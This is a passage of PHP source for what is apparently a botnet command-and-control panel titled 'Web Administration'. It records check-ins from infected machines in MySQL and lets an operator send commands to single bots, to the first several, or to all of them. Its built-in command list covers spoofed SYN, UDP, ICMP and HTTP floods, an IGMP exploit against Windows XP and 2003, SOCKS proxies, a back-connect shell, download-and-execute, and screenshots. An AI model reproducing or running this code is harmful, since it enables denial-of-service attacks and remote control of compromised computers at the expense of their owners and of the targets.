	mysql_close();
	return 1;
}

function db_bot_first_settask( $msg_in, $first  )
{
	GLOBAL $mysql_host, $mysql_user, $mysql_password, $mysql_dbname, $mysql_bots_table;
	if (!@mysql_connect( $mysql_host, $mysql_user, $mysql_password ))
		return "Cannot connect to database";		
	mysql_select_db( $mysql_dbname );
	
	$r = mysql_query( "SELECT ip,status FROM $mysql_bots_table WHERE 1=1" );

	for ($i = 0; $i < $first; $i++)
	{		
		if ($r && $arr = mysql_fetch_array( $r ))
		{
			$ip = $arr["ip"];
			$status = $arr["status"];
			if ($status == 0)
				$i--;
			else
				mysql_query( "UPDATE $mysql_bots_table SET status=0,msg_in=\"$msg_in\" WHERE ip=\"$ip\" AND status=1" );
		}
		else
			break;
	}
	
	mysql_close();
	return 1;
}

/* broadcast task */
function db_bot_all_settask( $msg_in )
{
	GLOBAL $mysql_host, $mysql_user, $mysql_password, $mysql_dbname, $mysql_bots_table;
	if (!@mysql_connect( $mysql_host, $mysql_user, $mysql_password ))
		return "Cannot connect to database";		
	mysql_select_db( $mysql_dbname );
	
	mysql_query( "UPDATE $mysql_bots_table SET status=0,msg_in=\"$msg_in\" WHERE status=1" );
	
	mysql_close();
	return 1;
}

function set_new_cmd( $newcmd )
{
	GLOBAL $newcmdfile;

	$f = fopen( $newcmdfile, "w" );
	fwrite( $f, $newcmd );
	fclose( $f );
	return 1;
}

function get_new_cmd()
{
	GLOBAL $newcmdfile;

	$f = @fopen( $newcmdfile, "r" );
	if (!$f) return "";
	$newcmd = @fgets( $f );	
	@fclose( $f );
	return $newcmd;
}

function view_cmd_list()
{
	?>
<center><b><p>Command must starts with prefix: !sinfo, @socks4, etc.<br></p><p>Some commands need arguments. To view usage, execute command without args.</p><p>List for v.0.2</p></b>
<table width="488" border="0" class="table">
  <tr>
	<td background="?img=2" width="120" scope="row"><div align="center">Command</td></div>
    <td width="352" background="?img=2"><div align="center">Description</td></div>
    <div align="center"></div></td>
  </tr>
<td background="?img=2" colspan=2 width="120" scope="row"><u>Flood commands</u></td>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>synflood</b></div></td>
    <td class="tableitem">TCP SYN flood, IP spoofing </td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>igmpexploit</b></div></td>
    <td class="tableitem">IGMP exploit - against Windows XP all and Windows 2003 all </td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>httpflood</b></div></td>
    <td class="tableitem">HTTP &quot;GET&quot; Flood.</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>icmpflood</b></div></td>
    <td class="tableitem">ICMP ping flood</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>udpflood</b></div></th>
    <td class="tableitem">UDP datagram flood, IP spoofing</td>
  </tr>
    <td class="tableitem" scope="row"><div align="center"><b>synfloodstop</b></div></td>
    <td class="tableitem">Stops TCP SYN flooding</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>httpfloodstop</b></div></td>
    <td class="tableitem">Stops HTTP flooding</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>icmpfloodstop</b></div></td>
    <td class="tableitem">Stops ICMP flooding</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>udpfloodstop</b></div></th>
    <td class="tableitem">Stops UDP flooding</td>
  </tr>
  
<td background="?img=2" colspan=2 width="120" scope="row"><u>Info commands</u></td>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>sinfo</b></div></td>
    <td class="tableitem">System information (CPU, RAM, Username, etc.)</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>vinfo</b></div></td>
    <td class="tableitem">Values information (Flood freq, timeout, packetsize)</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>dinfo</b></div></td>
    <td class="tableitem">Drives info (HDD partitions, sizes, etc.)</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>processes</b></div></th>
    <td class="tableitem">List of processes, to highlight process use !processes highlight_name</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>client</b></div></th>
    <td class="tableitem">Shows IRC and WEB client status</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>status</b></div></th>
    <td class="tableitem">Current tasks (Serverices Flood, etc.)</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>stopall</b></div></th>
    <td class="tableitem">Stop all tasks</td>
  </tr>

<td background="?img=2" colspan=2 width="120" scope="row"><u>Core commands</u></td>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>login</b></div></th>
    <td class="tableitem">(ONLY IRC) Authorization</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>logout</b></div></th>
    <td class="tableitem">(ONLY IRC) Logout</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>shutdown</b></div></th>
    <td class="tableitem">Shutdown bot</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>reconnect</b></div></th>
    <td class="tableitem">(ONLY IRC) Reconnect to IRC server</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>die</b></div></th>
    <td class="tableitem">Kill bot - restore registry, remove from autorun</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>ircadmin</b></div></th>
    <td class="tableitem">Change IRC server</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>ircradmin</b></div></th>
    <td class="tableitem">Change IRC reserve server</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>webadmin</b></div></th>
    <td class="tableitem">Change WEB server</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>webradmin</b></div></th>
    <td class="tableitem">Change WEB reserve server</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>ver</b></div></th>
    <td class="tableitem">View bot version</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>winrar</b></div></th>
    <td class="tableitem">Pack file with winrar (if installed)</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>irc</b></div></th>
    <td class="tableitem">Execute IRC command</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>echo</b></div></th>
    <td class="tableitem">Test. Echo message.</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>set</b></div></th>
    <td class="tableitem">Set variable value</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>nick</b></div></th>
    <td class="tableitem">Change nickname</td>
  </tr>
<td background="?img=2" colspan=2 width="120" scope="row"><u>Backdoor commands</u></td>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>msgbox</b></div></th>
    <td class="tableitem">Show messagebox</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>getpid</b></div></th>
    <td class="tableitem">Get process ID</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>killall</b></div></th>
    <td class="tableitem">Kill process by name</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>kill</b></div></th>
    <td class="tableitem">Kill process by ID</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>beep</b></div></th>
    <td class="tableitem">Beep signal</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>screenshot</b></div></th>
    <td class="tableitem">Save screenshot</td>
  </tr>
<td background="?img=2" colspan=2 width="120" scope="row"><u>IRC commands</u></td>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>op</b></div></th>
    <td class="tableitem">OP user on channel</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>deop</b></div></th>
    <td class="tableitem">DeOP user on channel</td>
  </tr>
<td background="?img=2" colspan=2 width="120" scope="row"><u>Service commands</u></td>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>ftpd</b></div></th>
    <td class="tableitem">Start FTP server</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>ftpdstop</b></div></th>
    <td class="tableitem">Stop FTP server</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>socks4</b></div></th>
    <td class="tableitem">Start SOCKS4 server</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>socks4stop</b></div></th>
    <td class="tableitem">Stop SOCKS4 server</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>socks5</b></div></th>
    <td class="tableitem">Start SOCKS5 server</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>socks5stop</b></div></th>
    <td class="tableitem">Stop SOCKS5 server</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>bindport</b></div></th>
    <td class="tableitem">Start bindport server</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>bindportstop</b></div></th>
    <td class="tableitem">Stop bindport server</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>dccshell</b></div></th>
    <td class="tableitem">Start DCC shell (back-connect DCC chat)</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>dccshellstop</b></div></th>
    <td class="tableitem">Stop DCC shell (back-connect DCC chat)</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>dccsend</b></div></th>
    <td class="tableitem">Send file via DCC file transfer</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>dccsendstop</b></div></th>
    <td class="tableitem">Stop DCC sending</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>email</b></div></th>
    <td class="tableitem">Send attach via smtp</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>get</b></div></th>
    <td class="tableitem">HTTP download and exec</td>
  </tr>
  <tr>
    <td class="tableitem" scope="row"><div align="center"><b>getstop</b></div></th>
    <td class="tableitem">Stop downloading</td>
  </tr>

</table>
</center>
	<?php	
}

if (isset( $_GET["act"] )) $act = $_GET["act"];
else
{
	if (isset( $_POST["act"] )) $act = $_POST["act"];
	else
		$act = "";
}

/* this function will be used by bots */
if ($act == "online")
{
	if (isset( $_GET["nickname"] ))
		$nickname = base64_decode( $_GET["nickname"] );
	else 		exit();

	if (isset( $_GET["s4"] )) $s4 = $_GET["s4"]; else $s4 = 0;
	if (isset( $_GET["s5"] )) $s5 = $_GET["s5"]; else $s5 = 0;
	if (isset( $_POST["msg_out"] )) $msg_out = base64_decode( $_POST["msg_out"] ); else $msg_out = "";
#	if (isset( $_GET["msg_out"] )) $msg_out = $_GET["msg_out"]; else $msg_out = "";
	die( db_bot_online( $nickname, $msg_out, $s4, $s5 ) );
}

session_start();
if (isset( $_POST["passwd"] ))
{
	session_register( "passwd" );
	$_SESSION["passwd"] = $_POST["passwd"];	
}

if (!isset( $_SESSION["passwd"] ) || $_SESSION["passwd"] != $password) $loginned = false; else $loginned = true;
if ($loginned)
{
if ($act == "logout")
{
	session_unregister( "passwd" );
	session_destroy();
	header( "Location: ?" );
	exit();
}
if ($act == "cleardb")
{
	db_clear();
	header( "Location: ?" );
	exit();
}
if ($act == "setnewcmd")
{
	if (!isset( $_POST["newcmd"] )) $newcmd = ""; else $newcmd = $_POST["newcmd"];
	set_new_cmd( $_POST["newcmd"] );
	header( "Location: ?" );
	exit();
}

	if ($act == "install") die( db_install() );
	if ($act == "execcmd")
	{
		if (isset( $_POST["cmd"] )) $cmd = $_POST["cmd"]; else exit();
		if (isset( $_POST["nickname"] )) $nickname = $_POST["nickname"]; else exit();
		if ( $_POST["first"] != "")
			db_bot_first_settask( $cmd, intval( $_POST["first"] ) );
		else
			if ($nickname == "")
				db_bot_all_settask( $cmd );
			else
				db_bot_settask( $nickname, $cmd );
		
		if (isset( $_POST["viewbots"] ))
			header( "Location: ?viewbots=".$_POST["viewbots"] );
		else
			header( "Location: ?" );

		exit();
	}
}

/* update database */
db_update();

?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<title>Web Administration</title>
<style type="text/css">
<!--
body,td,th {
	font-family: Geneva, Arial, Helvetica, sans-serif;
	font-size: 9px;
}
.table {
	font-family: Geneva, Arial, Helvetica, sans-serif;
	font-size: 9px;
	background-color: #EBEFF3;
	border: none;
	position: relative;
}
.tableitem {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 9px;
	color: #000000;
	border: none;
	background-color: #EBEFF3;
	background-image: url(?img=1);
	background-repeat: repeat-y;
}
a:link {
	color: #15487B;
	text-decoration: none;
}
a:hover {
	color: #2170BE;
	text-decoration: none;
	background-color: #FDF4DB;
}
.form {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 9px;
	color: #000000;
	border: 1px solid #000000;
	background-color: #EBEFF3;
	background-image: url(?img=1);
	background-repeat: repeat-y;
}
a:visited {
	text-decoration: none;
	color: #15487B;
}
a:active {
	text-decoration: none;
	color: #489FFF;
}
.formbutton {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 9px;
	color: #000000;
	border: none;
	background-color: #EBEFF3;
	background-image: url(?img=1);
	background-repeat: repeat-y;
}
.title {
	font-family: Georgia, "Times New Roman", Times, serif;
	font-size: 12px;
}
.title a:hover{
	background-color: #FDF4DB;
}
.tableitem2 {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 9px;
	color: #000000;
	border: none;
	background-color: #EBEFF3;
	background-image: url(?img=4);
	background-repeat: repeat-y;
}
body
{
	background-color: #F8F9FA;
	background-image: url();
	background-repeat: repeat-x;
}
.title2 {
	font-family: Georgia, "Times New Roman", Times, serif;
	font-size: 18px;
	font-weight: bold;
}
.tableitem3 {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 9px;
	color: #000000;
	border: none;
	background-color: #EBEFF3;
	background-image: url(?img=5);
	background-repeat: repeat-y;
}

-->
</style>
<script language="JavaScript">
<!--
function addn( uname )
{
	document.command_form.nickname.value = document.command_form.nickname.value + uname + ',';
	document.command_form.nickname.focus();
}
function addc( uname )
{
	document.command_form.cmd.value = uname;
	document.command_form.cmd.focus();
}
function clearnicknames()
{
	document.command_form.nickname.value = '';
	document.command_form.nickname.focus();
}
function submit_command()
{
	// check nickname(s)
	if (document.command_form.cmd.value == '')
		alert( 'Please enter command' );
	else
		document.command_form.submit();
}
function win( url, width, height )
{
	window.open( url, "", "statusbar=no,menubar=no,toolbar=no,scrollbars=yes,resizable=no,width=" + width + ",height=" + height );
}
-->
</script>
</head>

<body>
<?php
if (!$loginned)
{
	print "</center></p><form action=\"?\" method=\"post\" name=\"form1\" class=\"form\">".
	      "<p align=\"center\"><b>Password:</b>&nbsp;".
	      "<input name=\"passwd\" type=\"password\" class=\"form\" value=\"\">&nbsp;".
		  "<input name=\"\" type=\"submit\" class=\"form\" value=\"Login\">".
	      "</p>".
	      "</form>";
	exit();
}

if ($act == "viewfull")
{
	if (isset( $_GET["nickname"] )) $nickname = $_GET["nickname"]; else exit();
	die( db_bot_viewfull( $nickname ) );
}

if ($act == "cmdlist")
	die( view_cmd_list() );

if ($act == "viewconfig")
	die( view_config() );
?>
<form class="form">
<p>
<center class="title">
  <p class="title2">Web Administration</p>
  <p><a href="?act=install">[Install]</a>&nbsp;
        <a href="javascript:window.location.reload(false);">[Refresh]</a>&nbsp;
        <a href="javascript:win('?act=viewconfig',600,150);">[View Config]</a>&nbsp;
        <a href="?act=cleardb">[Clear Database]</a>&nbsp;
        <a href="javascript:win('?act=cmdlist',600,600);">[Cmd list]</a>
        <?php
		if (!isset( $_GET["viewbots"] ))
			print "<a href=\"?viewbots=1\">[View online bots]</a></p>";
		else
			print "<a href=\"?\">[View stats]</a></p>";
	?>
</center>
</p>
</form>

<center>
<form name="command_form" method="post" action="?">
Nicknames:
  <input name="act" type="hidden" value="execcmd">
<?php
	if (isset( $_GET["viewbots"] ))
		print "<input type=\"hidden\" name=\"viewbots\" value=\"".$_GET["viewbots"]."\">";
?>
      <input name="nickname" type="text" class="form" size="31">
      <input type="button" class="form" value="Clear" onclick="javascript:clearnicknames();">
&nbsp;&nbsp;&nbsp;&nbsp;First <input name="first" type="text" class="form" size="10">
&nbsp;&nbsp;&nbsp;&nbsp;Command: <input name="cmd" type="text" class="form" size="50">
      <input type="button" class="form" value=" Exec" onclick="javascript:submit_command();">
</form>
<form name="newcmdform" method="post" action="?">
  Current command for new bots: 
  <input name="act" type="hidden" value="setnewcmd">
  <input name="newcmd" type="text" class="form" size="110" value="<?php print htmlspecialchars( get_new_cmd() ); ?>">
    <input name="Submit" type="submit" class="form" value="Save">
</form>
</center>

<?php
{
	if (isset( $_GET["viewbots"] ))
	{
		print
		 "<table width=\"100%\" border=\"0\" align=\"center\" class=\"table\">".
		  "<tr>".
		    "<th width=\"13\" scope=\"col\">#</th>".
		    "<th width=\"63\" nowrap background=\"?img=2\" scope=\"col\">Last time</th>".
		    "<th width=\"72\" height=\"20\" background=\"?img=2\" class=\"table\" 	scope=\"col\">IP</th>".
		    "<th width=\"84\" background=\"?img=2\" scope=\"col\">Nickname</th>".
		    "<th width=\"127\" background=\"?img=2\" scope=\"col\">Command</th>".
		    "<th width=\"288\" background=\"?img=2\" scope=\"col\">Response</th>".
		    "<th width=\"42\" background=\"?img=2\" scope=\"col\">SOCKS4</th>".
		    "<th width=\"42\" background=\"?img=2\" scope=\"col\">SOCKS5</th>".
		  "</tr>";
		db_list_bots();
	}
	else
	{
		print
"<table width=\"20%\" border=\"0\" align=\"center\" class=\"table\"><tr><th background=\"?img=2\"	colspan=\"2\" scope=\"row\">S T A T I S T I C S</th></tr>".
		"<tr><td class=\"tableitem\">Current online bots</td><td class=\"tableitem\">".db_num()."</td></tr>".
		"<tr><td class=\"tableitem\">Not answered</td><td class=\"tableitem\">".db_not_ans()."</td></tr>".
		"<tr><td class=\"tableitem\">Answered</td><td class=\"tableitem\">".db_ans()."</td></tr>".
		"<tr><td class=\"tableitem\">Socks4</td><td class=\"tableitem\">".db_s4_num()."</td></tr>".
		"<tr><td class=\"tableitem\">Socks5</td><td class=\"tableitem\">".db_s5_num()."</td></tr>".
		"</table>";
	}
}
?>
